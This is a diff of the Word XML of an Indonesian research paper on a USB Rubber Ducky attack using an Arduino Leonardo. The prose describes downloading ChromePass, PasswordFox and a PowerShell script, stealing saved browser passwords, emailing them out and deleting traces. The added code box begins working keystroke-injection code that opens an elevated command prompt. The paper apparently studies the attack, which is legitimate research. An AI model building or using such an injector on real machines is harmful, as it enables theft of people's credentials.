-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">disematkan oleh penyerang ke dalam perangkat Arduino. Hasil dari penyerangan ini akan didapatkan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dan </w:t>
+        <w:t xml:space="preserve"> Leonardo ke komputer target melalui port USB. Setelah itu USB Rubber Ducky akan  menjalankan baris kode yang disematkan oleh penyerang ke dalam perangkat Arduino. Proses yang berlangsung saat perangkat dihubungkan ke komputer target yaitu pembuatan folder, mengunduh program ChromePass, PasswordFox, dan Powershell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dari Github penulis, menjalankan program untuk mendapatkan data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, mengirimkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berisi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5352,27 +5765,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yang tersimpan pada browser Google Chrome serta Mozilla Firefox untuk kemudian dikirimkan ke komputer penyerang melalui </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> dari komputer target, serta menghapus folder untuk menghilangkan jejak penyerangan.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5705,23 +6098,6 @@
         </w:rPr>
         <w:t>Data yang telah didapatkan dari komputer target dikirimkan kepada penulis melalui email yang telah ditentukan dan dijalankan melalui Powershell. Penyerangan diakhiri dengan menghapus folder yang telah dibuat.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:before="6"/>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5743,7 +6119,16 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Pengembangan Sistem</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Pe</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="12" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="12"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>ngembangan Sistem</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5772,6 +6157,15 @@
         </w:rPr>
         <w:t xml:space="preserve"> mekanisme penyerangan yang dilakukan pada penelitian ini.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="284" w:firstLine="394"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5783,7 +6177,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03269778" wp14:editId="7A8D96BB">
             <wp:extent cx="1594714" cy="7497444"/>
@@ -5907,6 +6300,254 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="284"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berdasarkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>gambar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> diatas, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>sistem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> penyerangan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>diawali dengan perangkat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Arduino dihubungkan ke </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>komputer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lalu program akan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">membuat folder, mengunduh dan menjalankan ChromePass, PasswordFox, menjalankan Powershell </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> untuk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">melakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>compress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file, mengirimkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berisi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">username </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari komputer target, hingga menghapus folder dan menutup </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>command prompt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="284"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="284"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="284"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -5923,11 +6564,12 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc43264846"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc43264846"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Menjalankan </w:t>
       </w:r>
       <w:r>
@@ -5941,28 +6583,2587 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="284"/>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>...</w:t>
+        <w:ind w:left="284" w:firstLine="436"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar 3 berikut adalah baris perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Rubber Ducky Script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> untuk memberikan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">input </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>keyboard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> komputer target yang akan berjalan secara otomatis untuk menjalankan penyerangan.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="284"/>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
+        <w:keepNext/>
+        <w:ind w:left="284" w:firstLine="436"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B3D16AD" wp14:editId="53777058">
+                <wp:extent cx="5454595" cy="8913413"/>
+                <wp:effectExtent l="0" t="0" r="13335" b="21590"/>
+                <wp:docPr id="13" name="Text Box 13"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5454595" cy="8913413"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="lt1"/>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>#include "Keyboard.h"</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>void typeKey(int key) {</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.press(key);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                                <w:lang w:val="id-ID"/>
+                              </w:rPr>
+                              <w:t>100</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.release(key);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>void setup() {</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  // Begining the Keyboard stream</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.begin();</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  // Wait 500ms</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                                <w:lang w:val="id-ID"/>
+                              </w:rPr>
+                              <w:t>600</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.press(KEY_LEFT_GUI);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.press('r');</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.releaseAll();</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("powershell Start-Process cmd -Verb runAs");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
